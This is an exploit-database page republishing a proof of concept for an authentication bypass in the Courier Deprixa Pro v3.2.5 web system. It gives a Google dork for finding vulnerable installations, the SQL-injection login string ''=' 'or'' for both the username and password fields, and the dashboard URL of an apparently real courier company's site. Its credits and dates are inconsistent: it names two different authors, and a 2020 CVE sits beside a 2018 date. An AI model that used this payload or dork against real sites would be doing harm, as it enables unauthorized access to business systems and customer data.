Advertisement






Courier Deprixa Pro - Integrated Web System v3.2.5 Auth by pass Vulnerability

CVE Category Price Severity
CVE-2020-22613 CWE-287 Not specified High
Author Risk Exploitation Type Date
Touhid M.Shaikh Critical Remote 2018-07-10
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070108

Below is a copy:

Courier Deprixa Pro - Integrated Web System v3.2.5 Auth by pass Vulnerability
====================================================================================================================================
| # Title     : Courier Deprixa Pro - Integrated Web System v3.2.5  Auth by pass Vulnerability                                     |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro)                                                                                        |
| # Vendor    : https://codecanyon.net/item/courier-deprixa-pro-integrated-web-system-v32/15216982                                 |  
| # Dork      : DEPRIXA 3.2.5 | lOGIN                                                                                              |
====================================================================================================================================


poc :

[+] Dorking n Google Or Other Search Enggine 

[+] user & pass : '=' 'or'

https://bluedotcourrier.com/dashboard/index.php

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum